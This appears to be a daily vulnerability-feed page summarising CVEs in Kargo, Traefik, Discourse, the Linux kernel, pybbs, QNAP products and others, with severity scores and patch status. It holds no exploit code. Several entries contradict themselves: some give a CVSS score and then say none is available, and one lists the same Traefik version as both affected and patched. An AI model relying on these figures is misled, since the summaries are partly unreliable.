Kargo versions 1.4.0-1.6.3, 1.7.0-1.7.8, 1.8.0-1.8.11, and 1.9.0-1.9.4 contain a Server-Side Request Forgery vulnerability in http and http-download promotion steps that allows authenticated attackers to access cloud instance metadata endpoints and exfiltrate sensitive credentials like IAM keys. An attacker with permissions to create or modify Stages or Promotion resources can exploit this by crafting malicious manifests with full control over request headers and methods, bypassing cloud provider SSRF protections. Currently, no patch is available for this vulnerability.

SSRF Information Disclosure
CVE-2026-32765 None
Rejected reason: This repository is no longer public.

Information Disclosure
CVE-2026-32764 None
Rejected reason: This repository is no longer public.

Information Disclosure
CVE-2026-32595 LOW CVSS 3.7
Traefik's BasicAuth middleware contains a timing attack vulnerability that enables username enumeration through observable response time differences between valid and invalid usernames. An unauthenticated network attacker can distinguish existing usernames from non-existent ones by measuring response latency-valid usernames trigger ~166ms bcrypt operations while invalid usernames return in ~0.6ms, creating a ~298x timing differential. Affected versions include Traefik 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1; patches are available in versions 2.11.41, 3.6.11, and 3.7.0-ea.2.

Information Disclosure
CVE-2026-30888 LOW CVSS 2.2
A privilege escalation vulnerability in Discourse allows moderators to edit site policy documents (Terms of Service, guidelines, privacy policy) despite explicit access restrictions, enabling unauthorized modification of critical site governance documents. This affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2. The vulnerability has a low CVSS score of 2.2 due to high attack complexity and privileged access requirement, but represents a clear integrity violation of role-based access controls.

Privilege Escalation
CVE-2026-23277 None
A NULL pointer dereference vulnerability exists in the Linux kernel's TEQL (Trivial Ethernet Queue Limiting) network scheduler when transmitting through tunnel slave devices, particularly gretap tunnels. The vulnerability occurs because teql_master_xmit() fails to update skb->dev to the slave device before transmission, causing tunnel xmit functions to reference unallocated per-CPU statistics on the TEQL master device. This allows a local or networked attacker to trigger a kernel page fault and crash the system, resulting in a denial of service. No CVSS score, EPSS risk score, or KEV active exploitation status is currently published, but patch commits are available in Linux kernel stable branches (6.18.19, 6.19.9, and 7.0-rc4).

Linux Denial Of Service Null Pointer Dereference Debian Ubuntu
CVE-2026-23276 None
A stack overflow vulnerability exists in the Linux kernel's tunnel transmission functions (iptunnel_xmit and ip6tunnel_xmit) due to missing recursion limits when GRE tap interfaces operate as slaves in bonded devices with broadcast mode enabled. This allows local attackers or legitimate multicast/broadcast traffic to trigger infinite recursion between bond_xmit_broadcast() and tunnel transmission functions, causing kernel stack exhaustion and denial of service. The vulnerability affects multiple Linux kernel versions and has been resolved with the addition of IP_TUNNEL_RECURSION_LIMIT (4) to prevent excessive stack consumption during nested tunnel packet encapsulation.

Linux Denial Of Service Stack Overflow Debian Ubuntu
CVE-2026-22895 LOW CVSS 2.2
A cross-site scripting (XSS) vulnerability exists in QuFTP Service that allows authenticated remote attackers with administrator credentials to bypass security mechanisms and read application data. The vulnerability affects multiple versions of QuFTP Service across different release branches (1.4.x, 1.5.x, and 1.6.x prior to specified patch versions). While no CVSS score, EPSS probability, or KEV status is currently available, the requirement for administrator-level access significantly constrains real-world exploitation risk.

XSS
CVE-2026-22735 LOW CVSS 2.6
CVE-2026-22735 is a security vulnerability (CVSS 2.6). Remediation should follow standard vulnerability management procedures.

Java Information Disclosure
CVE-2026-4495 LOW CVSS 3.5
A Stored Cross-Site Scripting (XSS) vulnerability exists in atjiu pybbs 6.0.0 within the CommentApiController.java file's create function, allowing authenticated attackers to inject malicious scripts that execute in the browsers of other users viewing comments. The vulnerability requires user interaction (UI:R per CVSS vector) but carries a low CVSS score of 3.5 due to low impact scope; however, a public proof-of-concept exploit is available and the vulnerability has been disclosed, increasing real-world exploitation risk despite the low severity rating.

Java XSS
CVE-2026-4494 LOW CVSS 3.5
A stored cross-site scripting (XSS) vulnerability exists in atjiu pybbs 6.0.0 within the TopicApiController.java create function that allows authenticated attackers to inject malicious scripts into topic creation requests. The vulnerability affects all versions of the pybbs application matching the CPE cpe:2.3:a:atjiu:pybbs:*:*:*:*:*:*:*:*, and while the CVSS score of 3.5 is low, a publicly available proof-of-concept exploit has been disclosed, indicating active research and potential real-world exploitation risk.

XSS Java
CVE-2026-4477 LOW CVSS 3.1
Yi Technology YI Home Camera 2 (version 2.1.1_20171024151200) contains a hard-coded cryptographic key vulnerability in its WPA/WPS component that allows attackers to disclose sensitive information through local network access. While the exploit has been publicly disclosed and proof-of-concept code is available, the attack requires high complexity and difficult exploitability, limiting real-world risk to local network environments only. The vendor was notified early but provided no response, leaving users without an official patch.

Information Disclosure
CVE-2026-4474 LOW CVSS 2.4
A stored cross-site scripting (XSS) vulnerability exists in itsourcecode University Management System version 1.0 within the /admin_single_student_update.php file, where the st_name parameter fails to properly sanitize user input. An authenticated administrator with high privileges can inject malicious scripts that execute in the context of other users' browsers, potentially leading to session hijacking, credential theft, or unauthorized administrative actions. A proof-of-concept exploit has been publicly disclosed on GitHub, increasing real-world exploitation risk despite the low CVSS score of 2.4.

PHP XSS
CVE-2026-3339 LOW CVSS 2.7
The Keep Backup Daily WordPress plugin versions up to 2.1.1 contain a limited path traversal vulnerability in the `kbd_open_upload_dir` AJAX action that allows authenticated administrators to enumerate arbitrary directories on the server. An attacker with Administrator-level access can exploit insufficient sanitization of the `kbd_path` parameter (using only `sanitize_text_field()` which does not prevent path traversal sequences) to list directory contents outside the intended uploads directory. While the CVSS score of 2.7 is low and exploitation requires high-privilege Administrator access, the vulnerability represents a real information disclosure risk in multi-user WordPress environments or where administrator accounts are compromised.

WordPress Path Traversal
CVE-2025-62843 LOW CVSS 0.9
An improper restriction of communication channel to intended endpoints vulnerability (CWE-923) has been identified in QNAP QHora devices, allowing attackers with physical access to exploit insufficient endpoint validation and gain privileges intended for legitimate endpoints. The vulnerability affects QHora/QuRouter products prior to version 2.6.3.009. While no CVSS score or EPSS data is currently available and the vulnerability does not appear in active exploitation databases (KEV), the physical access requirement significantly constrains real-world exploitability, though the privilege escalation impact remains concerning for organizations with physical security controls.

Privilege Escalation Authentication Bypass Qurouter
CVE-2025-59383 LOW CVSS 2.7
A stack-based buffer overflow vulnerability exists in QNAP Media Streaming Add-On that allows remote attackers to corrupt memory or crash the affected process. All versions prior to 500.1.1 are vulnerable, and the attack requires no authentication or user interaction. While no CVSS score or EPSS data is currently available, the presence of a confirmed patch and the critical nature of buffer overflow vulnerabilities in media processing software suggests this warrants immediate patching.

Buffer Overflow Denial Of Service Media Streaming Add On

Today's Vulnerabilities Vulnerabilities